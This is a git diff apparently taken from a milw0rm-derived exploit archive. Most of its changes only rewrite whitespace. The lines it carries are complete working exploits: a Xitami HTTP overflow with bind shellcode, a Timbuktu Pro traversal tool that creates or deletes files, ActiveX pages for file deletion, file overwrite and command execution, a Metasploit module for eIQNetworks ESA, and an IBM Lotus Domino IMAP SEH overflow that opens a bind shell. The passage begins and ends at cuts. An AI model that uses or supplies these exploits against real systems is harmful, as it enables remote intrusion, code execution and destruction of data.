+# +# [Module xigui32.exe] +# If-Modified-Since: Evil, ["A" * 76]\r\n +# EIP 41414141 +# +# [Module xitami.exe] +# If-Modified-Since: Evil, ["A" * 104]\r\n +# EIP 41414141 +# +# Product Homepage: http://www.xitami.com/ +# Just for fun ;) +## + +from struct import pack +from time import sleep +from socket import * + +host = "192.168.0.1" +port = 80 + +shellcode = ( +"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6" +"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7" +"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58" +"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae" +"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60" +"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf" +"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70" +"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33" +"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04" +"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2") + +opcode = pack(" - - - - - -# milw0rm.com [2007-09-24] + + + + + + +# milw0rm.com [2007-09-24] diff --git a/platforms/windows/remote/4455.pl b/platforms/windows/remote/4455.pl index 24a7eee48..16b5c8b92 100755 --- a/platforms/windows/remote/4455.pl +++ b/platforms/windows/remote/4455.pl 
@@ -1,126 +1,126 @@ -#!/usr/bin/perl -#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO -# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation -# -# Bug & Exploit by titon [titon{at}bastardlabs{dot}com] -# -# Advisory: -# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 -# -# Copyright: (c)2007 BastardLabs -#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO -# -# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407 -# -#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO -use IO::Socket; -use Time::HiRes qw(usleep); -## -## we start in the C:\Program Files\Timbuktu Pro\N1\ folder -## -$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat"); -##$filename = &promptUser("Filename" ,"../../../pnw3d.bat"); -$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!"); -## -##payload can be either text or binary (in \x42\x69\x42 format) -## -$payload =~ s/\\x(..)/pack("C",hex($1))/egi; -## -## packet1 == “hello” packet -## -$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b". -"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d". -"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00"; -$packet2= "\xff"; -## -## packet3 == packet containing the filename (with directory traversal) -## -$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94". 
-"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00". -"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ; -$packet4= "\xf9\x00"; -## -## packet5 == payload, the size of the payload is over 2 bytes -## so we have 65535 bytes of data to play with -## -$packet5= "\xf8" . pack("n",length($payload)) . $payload ; -$packet6= "\xf7"; -$packet7= "\xfa"; -$packet8= "\xfe"; -## -##DELETE THE FILE (IF NECESSARY) -## -print "[+] Delete the file (if necessary)\n"; -print "[+] Connecting...\n"; -$remote = &connection("$ARGV[0]","$ARGV[1]"); -print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; -print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); -print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); -print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); -## -## we break the connection before it's completed (i.e before the \xfe) -## -close $remote; -## -##(RE)CREATE THE FILE -## -print "[+] (Re)Create the file with our content\n"; -print "[+] Connecting...\n"; -$remote = &connection("$ARGV[0]","$ARGV[1]"); -print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; -print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); -print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); -print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); -print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000); -print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000); -print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000); -print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000); -print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000); -close $remote; -sub connection -{ -local($dest,$port) = @_; -my $remote; -if (!$port or !dest) { -print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; } -else -{ -$remote = IO::Socket::INET->new( -Proto => tcp, -PeerAddr 
=> $dest, -PeerPort => $port, -Timeout => 1) or print "[-] Error: Could not establish a -connection to $dest:$port\n" and exit; -return $remote; -} -} -sub promptUser { -local($promptString,$defaultValue) = @_; -if ($defaultValue) { -print $promptString, "[", $defaultValue, "]: "; -} else { -print $promptString, ": "; -} -$| = 1; # force a flush after our print -$_ = ; # get the input from STDIN -chomp; -if ("$defaultValue") { -return $_ ? $_ : $defaultValue; # return $_ if it has a value -} else { -return $_; -} -} - -# milw0rm.com [2007-09-25] - -# milw0rm.com [2008-03-11] +#!/usr/bin/perl +#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO +# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation +# +# Bug & Exploit by titon [titon{at}bastardlabs{dot}com] +# +# Advisory: +# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 +# +# Copyright: (c)2007 BastardLabs +#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO +# +# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407 +# +#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO +use IO::Socket; +use Time::HiRes qw(usleep); +## +## we start in the C:\Program Files\Timbuktu Pro\N1\ folder +## +$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat"); +##$filename = &promptUser("Filename" ,"../../../pnw3d.bat"); +$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!"); +## +##payload can be either text or binary (in \x42\x69\x42 format) +## +$payload =~ s/\\x(..)/pack("C",hex($1))/egi; +## +## packet1 == “hello” packet +## +$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b". +"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00". 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d". +"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00"; +$packet2= "\xff"; +## +## packet3 == packet containing the filename (with directory traversal) +## +$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94". +"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00". +"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ; +$packet4= "\xf9\x00"; +## +## packet5 == payload, the size of the payload is over 2 bytes +## so we have 65535 bytes of data to play with +## +$packet5= "\xf8" . pack("n",length($payload)) . $payload ; +$packet6= "\xf7"; +$packet7= "\xfa"; +$packet8= "\xfe"; +## +##DELETE THE FILE (IF NECESSARY) +## +print "[+] Delete the file (if necessary)\n"; +print "[+] Connecting...\n"; +$remote = &connection("$ARGV[0]","$ARGV[1]"); +print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; +print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); +print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); +print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); +## +## we break the connection before it's completed (i.e before the \xfe) +## +close $remote; +## +##(RE)CREATE THE FILE +## +print "[+] (Re)Create the file with our content\n"; +print "[+] Connecting...\n"; +$remote = &connection("$ARGV[0]","$ARGV[1]"); +print "[+] Connected to $ARGV[0]:$ARGV[1]\n"; +print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000); +print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000); +print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000); +print $remote $packet4; print "[+] 
Packet 4 Sent\n"; usleep (80000); +print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000); +print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000); +print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000); +print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000); +close $remote; +sub connection +{ +local($dest,$port) = @_; +my $remote; +if (!$port or !dest) { +print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; } +else +{ +$remote = IO::Socket::INET->new( +Proto => tcp, +PeerAddr => $dest, +PeerPort => $port, +Timeout => 1) or print "[-] Error: Could not establish a +connection to $dest:$port\n" and exit; +return $remote; +} +} +sub promptUser { +local($promptString,$defaultValue) = @_; +if ($defaultValue) { +print $promptString, "[", $defaultValue, "]: "; +} else { +print $promptString, ": "; +} +$| = 1; # force a flush after our print +$_ = ; # get the input from STDIN +chomp; +if ("$defaultValue") { +return $_ ? $_ : $defaultValue; # return $_ if it has a value +} else { +return $_; +} +} + +# milw0rm.com [2007-09-25] + +# milw0rm.com [2008-03-11] diff --git a/platforms/windows/remote/4468.html b/platforms/windows/remote/4468.html index 865423452..01af430ee 100755 --- a/platforms/windows/remote/4468.html +++ b/platforms/windows/remote/4468.html @@ -1,53 +1,53 @@ - - - - - - -
    - -
    - - - - -
    -  ----
    - | y0! |
    -  ----
    -          \  \_\_    _/_/
    -           \     (oo)\_______
    -                 |_|\        )*
    -                     ||----w |
    -                     ||     ||
    -
    - - - -# milw0rm.com [2007-09-29] + + + + + + +
    + +
    + + + + +
    +  ----
    + | y0! |
    +  ----
    +          \  \_\_    _/_/
    +           \     (oo)\_______
    +                 |_|\        )*
    +                     ||----w |
    +                     ||     ||
    +
    + + + +# milw0rm.com [2007-09-29]
diff --git a/platforms/windows/remote/4487.html b/platforms/windows/remote/4487.html
index fd886d402..b99738c34 100755
--- a/platforms/windows/remote/4487.html
+++ b/platforms/windows/remote/4487.html
@@ -1,34 +1,34 @@ -
    ------------------------------------------------------------------------------
    - Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion
    - url: http://www.pegasusimaging.com/
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - Description:
    - Component name: PegasusImaging.ActiveX.ThumbnailXpress1.dll
    - Version: 1.0.45.0
    - This control contains an insecure "CacheFile()" method that delete, once
    - the process is terminated, the file passed as argument.
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-10-05] +
    +-----------------------------------------------------------------------------
    + Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion
    + url: http://www.pegasusimaging.com/
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + Description:
    + Component name: PegasusImaging.ActiveX.ThumbnailXpress1.dll
    + Version: 1.0.45.0
    + This control contains an insecure "CacheFile()" method that delete, once
    + the process is terminated, the file passed as argument.
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +# milw0rm.com [2007-10-05]
    diff --git a/platforms/windows/remote/4488.html b/platforms/windows/remote/4488.html
    index ce26cf264..6a821bc73 100755
    --- a/platforms/windows/remote/4488.html
    +++ b/platforms/windows/remote/4488.html
    @@ -1,37 +1,37 @@
    -
    ------------------------------------------------------------------------------
    - Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite
    - url: http://www.pegasusimaging.com/
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - Description:
    - Component name: PegasusImaging.ActiveX.ImagXpress8.dll
    - Vesrion: 8.0.41.0
    - This component contains an insecure "CompactFile()" which overwrites
    - arbitrary files on user's pc.
    - Passing to the first parameter (sourceFile) of the method an existing
    - file as argument (e.g. a well known file as cmd.exe), the file passed
    - as argument to the second parameter (destFile) will be overwrite.
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -# milw0rm.com [2007-10-05]
    +
    +-----------------------------------------------------------------------------
    + Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite
    + url: http://www.pegasusimaging.com/
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + Description:
    + Component name: PegasusImaging.ActiveX.ImagXpress8.dll
    + Vesrion: 8.0.41.0
    + This component contains an insecure "CompactFile()" which overwrites
    + arbitrary files on user's pc.
    + Passing to the first parameter (sourceFile) of the method an existing
    + file as argument (e.g. a well known file as cmd.exe), the file passed
    + as argument to the second parameter (destFile) will be overwrite.
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +# milw0rm.com [2007-10-05]
    diff --git a/platforms/windows/remote/45.c b/platforms/windows/remote/45.c
    index cab84fbf8..e81d2e6c2 100755
    --- a/platforms/windows/remote/45.c
    +++ b/platforms/windows/remote/45.c
    @@ -256,6 +256,6 @@
     exit(0);
     return 0;
     }
    -
    -
    -// milw0rm.com [2003-06-23]
    +
    +
    +// milw0rm.com [2003-06-23]
    diff --git a/platforms/windows/remote/4506.html b/platforms/windows/remote/4506.html
    index 0734cef8e..bab204a40 100755
    --- a/platforms/windows/remote/4506.html
    +++ b/platforms/windows/remote/4506.html
    @@ -1,43 +1,43 @@
    -
    ------------------------------------------------------------------------------
    - Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
    - url: http://www.microsoft.com
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Technical Details
    - File: FPOLE.OCX
    - Version: 6.0.8450.0
    - MD5: E9A1D8CFE6C791BA76B7343FA39752FB
    - 
    - Marked as:
    - RegKey Safe for Script: False
    - RegKey Safe for Init: False
    - Implements IObjectSafety: True
    - IDisp Safe: Safe for untrusted: caller
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - 
    - When I released this http://www.milw0rm.com/exploits/4369 I never thought
    - it was possible to use the "FoxDoCmd()" method to run applications passed
    - as argument but...
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -# milw0rm.com [2007-10-09]
    +
    +-----------------------------------------------------------------------------
    + Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
    + url: http://www.microsoft.com
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Technical Details
    + File: FPOLE.OCX
    + Version: 6.0.8450.0
    + MD5: E9A1D8CFE6C791BA76B7343FA39752FB
    + 
    + Marked as:
    + RegKey Safe for Script: False
    + RegKey Safe for Init: False
    + Implements IObjectSafety: True
    + IDisp Safe: Safe for untrusted: caller
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + 
    + When I released this http://www.milw0rm.com/exploits/4369 I never thought
    + it was possible to use the "FoxDoCmd()" method to run applications passed
    + as argument but...
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +# milw0rm.com [2007-10-09]
    diff --git a/platforms/windows/remote/4526.html b/platforms/windows/remote/4526.html
    index 391e0f3b0..f806e3331 100755
    --- a/platforms/windows/remote/4526.html
    +++ b/platforms/windows/remote/4526.html
    @@ -1,20 +1,20 @@
    -
    -Found by: Katatafish (karatatata{at}hush{dot}com)
    -software:PBEmail 7 ActiveX Edition
    -Vendor: http://www.perfectionbytes.com
    -vulnerability: Insecure method
    -SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
    -Tested on Internet explorer 7 with Windows XP SP 2.
    -Thanks: str0ke
    -
    -
    -
    -
    -
    -
    -# milw0rm.com [2007-10-12]
    +
    +Found by: Katatafish (karatatata{at}hush{dot}com)
    +software:PBEmail 7 ActiveX Edition
    +Vendor: http://www.perfectionbytes.com
    +vulnerability: Insecure method
    +SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
    +Tested on Internet explorer 7 with Windows XP SP 2.
    +Thanks: str0ke
    +
    +
    +
    +
    +
    +
    +# milw0rm.com [2007-10-12]
    diff --git a/platforms/windows/remote/4566.rb b/platforms/windows/remote/4566.rb
    index f8b9646c5..a85e92116 100755
    --- a/platforms/windows/remote/4566.rb
    +++ b/platforms/windows/remote/4566.rb
@@ -1,84 +1,84 @@ -## -# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - - -require 'msf/core' - -module Msf - -class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - include Exploit::Remote::Egghunter - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'eIQNetworks ESA SEARCHREPORT Overflow', - 'Description' => %q{ - This module exploits a stack overflow in eIQnetworks - Enterprise Security Analyzer. During the processing of - long arguments to the SEARCHREPORT command, a stack-based - buffer overflow occurs. - }, - 'Author' => [ 'ri0t ', ], - 'Version' => '$Revision: 4529 $', - 'References' => - [ - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - }, - 'Payload' => - { - 'Space' => 1962, - 'BadChars' => "\x00", - 'ActiveTimeout' => 15, - }, - 'Platform' => 'win', - - 'Targets' => - [ - ['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ], - - ], - - 'Privileged' => false, - - 'DisclosureDate' => '' - - )) - - register_options( - [ - Opt::RPORT(10616) - ], self.class) - end - - def exploit - connect - - print_status("Trying target #{target.name}...") - - hunter = generate_egghunter() - egg = hunter[1] - filler = make_nops(target['Offset'] - payload.encoded.length) - sploit = "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] + "&"; - puts sploit - sock.put(sploit) - handler - disconnect - end - -end -end - -# milw0rm.com [2007-10-24] +## +# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and 
commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +module Msf + +class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'eIQNetworks ESA SEARCHREPORT Overflow', + 'Description' => %q{ + This module exploits a stack overflow in eIQnetworks + Enterprise Security Analyzer. During the processing of + long arguments to the SEARCHREPORT command, a stack-based + buffer overflow occurs. + }, + 'Author' => [ 'ri0t ', ], + 'Version' => '$Revision: 4529 $', + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + }, + 'Payload' => + { + 'Space' => 1962, + 'BadChars' => "\x00", + 'ActiveTimeout' => 15, + }, + 'Platform' => 'win', + + 'Targets' => + [ + ['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ], + + ], + + 'Privileged' => false, + + 'DisclosureDate' => '' + + )) + + register_options( + [ + Opt::RPORT(10616) + ], self.class) + end + + def exploit + connect + + print_status("Trying target #{target.name}...") + + hunter = generate_egghunter() + egg = hunter[1] + filler = make_nops(target['Offset'] - payload.encoded.length) + sploit = "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] + "&"; + puts sploit + sock.put(sploit) + handler + disconnect + end + +end +end + +# milw0rm.com [2007-10-24] diff --git a/platforms/windows/remote/4574.pl b/platforms/windows/remote/4574.pl index f4a0fd277..2f0518661 100755 --- a/platforms/windows/remote/4574.pl +++ b/platforms/windows/remote/4574.pl 
@@ -1,187 +1,187 @@ -#!perl -# -# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit -# -# Author: Manuel Santamarina Suarez -# e-Mail: FistFuXXer@gmx.de -# - -use IO::Socket; -use File::Basename; - -# -# destination TCP port -# -$port = 143; - -# -# SE handler -# -# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) -# You must use a POP/POP/RET sequence that doesn't modify the ESP register or -# the shellcode decoder will fail. -# -$seh = reverse( "\x60\x21\x53\x4E" ); # POP EDI/POP EBP/RET - # nnotes.6021534e - # universal on Lotus Domino 7.0.2FP1 - - -# -# Shellcode -# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) -# -# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444) -# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP) -# -$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI". - "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS". - "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV". - "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3". - "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo". - "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo". - "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp". - "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc". - "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M". - "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70". - "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs". - "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA"; - -# -# JUMP to 'ESP adjustment' and shellcode -# -$jmp = "\x74\x20". # JE SHORT - "\x75\x20"; # JNZ SHORT - - -# -# -# Don't edit anything after this line -# -# - -$sc_limit = 2300; - -sub usage { - print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n". - "Example: ". basename( $0 ) . 
" 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n". - "\n". - "Targets:\n". - "[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n". - "[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n"; - exit; -} - - -# Net::IP::ip_is_ipv4 -sub ip_is_ipv4 { - my $ip = shift; - - unless ($ip =~ m/^[\d\.]+$/) { - return 0; - } - - if ($ip =~ m/^\./) { - return 0; - } - - if ($ip =~ m/\.$/) { - return 0; - } - - if ($ip =~ m/^(\d+)$/ and $1 < 256) { - return 1 - } - - my $n = ($ip =~ tr/\./\./); - - unless ($n >= 0 and $n < 4) { - return 0; - } - - if ($ip =~ m/\.\./) { - return 0; - } - - foreach (split /\./, $ip) { - unless ($_ >= 0 and $_ < 256) { - return 0; - } - } - - return 1; -} - - -print "--------------------------------------------------------\n". - ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n". - "--------------------------------------------------------\n\n"; - -if( ($#ARGV+1) != 4 ) { - &usage; -} - -$user = $ARGV[2]; -$pass = $ARGV[3]; - -# Windows 2000 SP4 -if( $ARGV[0] == 1 ) { - $popad = "\x41" x 3 . # INC ECX - "\x61" x 51; # POPAD -} -# Windows 2003 SP2 -elsif( $ARGV[0] == 2 ) { - $popad = "\x41" x 2 . # INC ECX - "\x61" x 52; # POPAD -} -else { - &usage; -} - -if( ip_is_ipv4( $ARGV[1] ) ) { - $ip = $ARGV[1]; -} -else -{ - &usage; -} - -if( length( $sc ) > $sc_limit ) { - print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n"; - exit; -} - -print "[+] Connecting to $ip:$port...\n"; - -$sock = IO::Socket::INET->new ( - PeerAddr => $ip, - PeerPort => $port, - Proto => 'tcp', - Timeout => 2 -) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit; - -print "[+] Connected.\n"; - -$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . 
"\x44" x 3000; -$sock->recv( $recv, 1024 ); -$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" ); -$sock->recv( $recv, 1024 ); - -if( $recv ne "a001 OK LOGIN completed\r\n" ) { - print "[-] Error: Invalid username or password!\n"; - exit; -} - -print "[+] Successfully logged in.\n". - "[+] Trying to overwrite and control the SE handler...\n"; - -$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" ); -$sock->recv( $recv, 1024 ); -$sock->send( "$mailbox\r\n" ); -$sock->recv( $recv, 1024 ); -$sock->send( "a003 LSUB arg1 arg2\r\n" ); -sleep( 3 ); -close( $sock ); - -print "[+] Done. Now check for a bind shell on $ip:4444!\n"; - -# milw0rm.com [2007-10-27] +#!perl +# +# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit +# +# Author: Manuel Santamarina Suarez +# e-Mail: FistFuXXer@gmx.de +# + +use IO::Socket; +use File::Basename; + +# +# destination TCP port +# +$port = 143; + +# +# SE handler +# +# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) +# You must use a POP/POP/RET sequence that doesn't modify the ESP register or +# the shellcode decoder will fail. +# +$seh = reverse( "\x60\x21\x53\x4E" ); # POP EDI/POP EBP/RET + # nnotes.6021534e + # 